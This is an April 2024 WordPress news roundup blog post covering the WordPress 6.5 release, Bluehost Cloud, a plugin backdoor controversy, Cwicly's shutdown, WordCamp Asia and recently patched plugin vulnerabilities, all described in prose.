📆 This is the April 2024 edition of “This Month in WordPress with CodeinWP.”
Hey WordPress fans, I am back with your latest dose of WordPress news and events from the past month…or so.
In the biggest news of the month, WordPress 6.5 is being shipped today after having been pushed back from March 26th. Bluehost also launched a new cloud hosting service, along with what appears to be a pretty tight partnership with Automattic.
Plus, there were two big stories when it comes to WordPress plugins, including a developer intentionally building in a backdoor to his plugin to catch people using it without a license. Wild stuff!
Beyond that, I have lots of smaller tidbits to share, including WordCamp Asia 2024 and 2025, the DE{CODE} conference, installing WordPress on a Raspberry Pi, and more.
April 2024 WordPress News with CodeinWP
WordPress 6.5 release
In the biggest news of the month, is the release of WordPress 6.5, which was pushed back from March 26th (its original release date) to April 2nd.
You can read this post on the Make WordPress Core blog to learn why it was pushed back. Some of the main issues seem to involve the Font Library feature, which had already been pushed back since that feature was originally intended for WordPress 6.4.
However, because we saw multiple Release Candidates in March, I can still share some of the biggest new features for users and developers.
WordPress 6.5 notable new features for users:
- Font Library – we should hopefully get access to the Font Library feature that was originally scheduled for WordPress 6.4 and also caused issues with the WordPress 6.5 release date. You’ll be able to more easily install and use multiple fonts for block themes.
- List view improvements – you now get more control in List View in the editor. You can rename blocks, right-click blocks to see settings, and more.
- Improved style revisions – you can now more easily view past revisions in the style manager. One improvement that I find especially useful is that you’ll now be able to see a brief text summary of what each revision contains (e.g. “Changed style for the Button block”).
- New design options – you can access some new design options in core blocks, including improved background images for the Group block, shadow support for Column(s) and Image blocks, and aspect ratio support for the Cover block.
- Option to duplicate patterns – you can now duplicate and rename an existing pattern on your site. I think that this will be really handy for creating similar but distinct patterns.
- AVIF image format support – you’ll now be able to upload AVIF images directly to the Media Library. If you want an easy way to convert your existing images to Avif, you can use an image optimization plugin (our tool Optimole can do that).
WordPress 6.5 notable new features for developers:
- Block Bindings API – this new API will help developers connect blocks to various data sources, including custom fields, suite data, user data, and more. This API is a work in progress, though. In 6.5, it added the ability to connect block attributes and custom fields, but this functionality will continue to grow over time.
- Interactivity API – this new API will help developers standardize adding interactive elements to blocks, which will aid them in more easily building modern front-end interfaces. You can check out the WP Movies dev site for a showcase of what the Interactivity API can do.
- Plugin dependencies – a lot of WordPress plugins require other plugins to be installed in order to function. For example, our Sparks plugin only works on sites using the WooCommerce plugin. Plugin developers now have an official way to control these dependencies by adding a “Requires Plugins” entry into the plugin header. These required plugins will show up in the WordPress plugins list.
The features above are by no means a complete list – they’re just some of the features that I found to be the most interesting for casual users and developers.
Because WordPress 6.5 is a major feature release*, you do not need to apply the update right away. In fact, I usually recommend waiting a couple of weeks just to make sure any potential issues are ironed out.
*In contrast, I always recommend applying security and maintenance releases right away.
Bluehost launches new cloud hosting service powered by WP Cloud
In early March, Bluehost announced the launch of a new managed WordPress hosting service called Bluehost Cloud.
Normally, I wouldn’t find a new hosting service especially noteworthy, but there are two things that I find especially interesting about this launch.
First off, Bluehost Cloud is based on WP Cloud. If you don’t remember this name (I talked about it all the way back in October 2022), WP Cloud is a service from Automattic that helps hosting companies access “the tools [they] need to add scalable, highly available, extremely fast WordPress hosting to [their] product offering”.
The second interesting thing about this launch is that it seems to be part of a partnership with Automattic. Bluehost Cloud is now listed on the regular WordPress.com Pricing page, right beside the WordPress.com Entrepreneur plan.
Given this type of commercial relationship between WordPress.com and Bluehost, I wouldn’t be surprised to see this draw additional scrutiny to the WordPress.org recommended hosting page, where Bluehost has long been recommended and people have taken issue with the lack of transparency around which hosts get listed there.
Bluehost’s parent company invested in Automattic all the way back in 2014 (back when the Bluehost parent was known as Endurance International Group), so the companies have long had a business connection.
Bluehost Cloud prices start at $79.99 per month with regular pricing, but are available at a promo rate of $29.99 per month for the first year. On the WordPress.com Pricing page, however, the Bluehost Cloud plan is listed at $65 per month.
You may also be interested in:
- WP Engine and Automattic Trade Cease-and-Desist Letters After Matt Mullenweg Jabs
- 40+ Best WordPress Articles of 2023! Our Take On the Most Interesting and Excellent Stories of the Year
- WordPress 6.6 Released on July 16, Bringing New Upgrades and Site Editor Features
A WordPress plugin added a backdoor to harm the websites of people using it without a license
I saw this next story generate a ton of controversy in some popular WordPress Facebook groups, and rightfully so.
In March, a user in the Bricks plugin Facebook group accused the third-party BricksUltimate add-on of adding a backdoor in its code that lets the plugin drop database tables from sites (such as wp_posts or wp_users, which would pretty much completely disable the site and delete important data).
Note – I want to make it totally clear that all of this revolves around a third-party add-on for Bricks. None of what I’m talking about here applies to the actual Bricks plugin.
Was the plugin hacked? Was somebody inserting malware in an otherwise quality plugin?
Nope! It turns out that the plugin’s developer had intentionally added this code to the plugin in a bid to protect against people using “pirated” copies of the plugin.
I put “pirated” in quotes because I’m not sure the term pirating even makes sense when talking about GPL software.
Every three hours, the plugin checked for an active license. If the license check failed, the developer had the ability to inject any SQL commands, including dropping some or all of the site’s database tables.
To make matters worse, the developer seems to have initially doubled down when this backdoor was publicized in the Facebook groups, which wasn’t a great look.
The developer did eventually apologize, removing the offending code and posting an apology in the Facebook groups and on his website.
Look – I totally understand that seeing people use your plugin without paying is frustrating for developers. But this is absolutely not the way to go about combating it (and it’s even illegal in a lot of countries, including the USA).
Cwicly abruptly discontinues development
Next, let’s look at another bit of plugin-related drama.
Cwicly is/was a plugin that extends the block editor with a number of new features and functionalities. The plugin seemed to be growing well, with a lot of happy users.
However, in early March, the Cwicly developer abruptly announced that he would be discontinuing development of the plugin because of “the relentless onslaught of destructive posts and comments by certain WordPress influencers”.
That includes “personal attacks on both myself and team members” which have “taken a significant toll on our morale and motivation”.
Those quotes are part of a longer email that he sent to Cwicly users, which you can read in full in this Search Engine Journal post.
While I feel for the Cwicly team, this abrupt discontinuation is obviously a huge blow to people who have built their own websites (or client websites) using Cwicly. Those users will now need to hurry to rebuild those sites using a different tool.
To its credit, the Cwicly team is at least refunding all payments that were made in 2024 and has pledged to continue supporting customers with security and bug fixes through the end of 2024. They will also offer paid maintenance plans in 2025 and onwards.
This will at least give people some time to move their sites to a different solution.
Unfortunately, I think this event could mean that some users will be less likely to try new products when building websites. If you have to choose between an upstart tool or an established player, the established player might start looking more attractive.
WP Tavern has a good post about the issue, including lots of reactions from people in the WordPress community. WPJohnny also shared his thoughts on the topic.
Can you install WordPress on a Raspberry Pi? Joe found out
Ever had the urge to install WordPress in weird places? I can’t say that I have, but I obviously don’t speak for all of us because Joe Warnimont just spent a day installing WordPress on his Raspberry Pi.
If you want to learn how Joe did it, you can check out his full step-by-step tutorial here.
DE{CODE} 2024: AI and WordPress development (+ other talks)
As I mentioned last month, WP Engine’s DE{CODE} 2024 virtual developer conference was held on March 19th (and 21st), which marked the fifth year that the all-day event was held.
One of the more topical talks was a 23-minute presentation from the WP Engine founder (Jason Cohen) and one of WP Engine’s product managers (Luke Patterson), along with some other speakers.
The talk focuses on how WordPress developers can use AI tools in real-world situations, along with what the future of WordPress development might look like in a world where these tools exist.
If you want to see even more talks, you can check out a full YouTube playlist of all the DE{CODE} 2024 talks.
WordCamp Asia 2024 finishes up in Taipei, Taiwan
In early March, WordCamp Asia 2024 went off without a hitch.
Over 1,300 people headed off to Taiwan to visit the Taipei International Convention Center for three days of WordPress-related talks and networking.
If you weren’t able to attend, you can watch all of the WordCamp Asia 2024 talks on YouTube.
I’ve also put together some posts from around the web that recap WordCamp Asia 2024:
- Freemius recap
- GoDaddy recap
- WordPress.org highlights post
- Jetpack recap
- WordPress.org podcast episode (it’s only nine minutes)
While on the topic of WordCamp Asia, we also now know where and when the 2025 version will be.
WordCamp Asia 2025 will be held in February 2025 in Manila, Philippines.
The WordCamp Asia 2025 website is up and they’ve already put out a call for organizers. If you’re located in Manila (or anywhere else) and want to help the 2025 event be a success, you can submit this form on Google Forms to join the team.
State of the Word outside the USA for the second year straight
For much of its history, Matt Mullenweg gave his annual State of the Word address at WordCamp USA.
However, in early March, Matt announced that he will present the 2024 State of the Word from Tokyo Japan, marking the second time in a row that the address has happened outside the USA.
Last year, Matt gave the address from Madrid, Spain, which was the first time the speech had been held outside of the USA.
Fittingly, Matt announced this as part of the Q&A session at WordCamp Asia 2024 in Taipei.
In the WP Tavern post about this, I found one really interesting detail about Japan’s connection to WordPress.
According to Shusei Toda, a Tokyo-based WordCamp Asia 2024 organizer, an incredible 82.3% of Japanese websites use WordPress, which is almost double the global average of 43.5%.
Some vulnerabilities in popular WordPress plugins and themes
Finally, let’s finish with a rapid-fire rundown of some security vulnerabilities in popular themes and plugins that were discovered in the past month:
- Essential Addons for Elementor – Wordfence discovered a stored XSS vulnerability in this massively popular third-party add-on for Elementor. If you’re not using at least version 5.9.12 (released on March 25th), you’ll want to update ASAP.
- Astra theme – on March 23, the developers of the popular Astra theme quietly patched a stored XSS vulnerability in the core theme that’s available at WordPress.org. If you’re not using at least version 4.6.9 of the core Astra theme, you’ll want to update ASAP.
- Create by Mediavine – on March 19, Wordfence published a critical vulnerability in Create by Mediavine (a plugin that offers recipe cards and other elements popular with Mediavine publishers). If you’re not using at least version 1.9.5 of the plugin, you should update it ASAP.
- File Manager and File Manager Pro – on March 4, Wordfence published a critical vulnerability that affects both the File Manager and File Manager Pro plugins, two very popular plugins that people use to manage files from their WordPress dashboards. This vulnerability was patched in version 7.2.2 of the free version at WordPress.org and version 8.3.5 of the Pro version.
That sums up our April 2024 WordPress news roundup. Anything we missed?
…
Don’t forget to join our crash course on speeding up your WordPress site. Learn more below:
Layout and presentation by Karol K.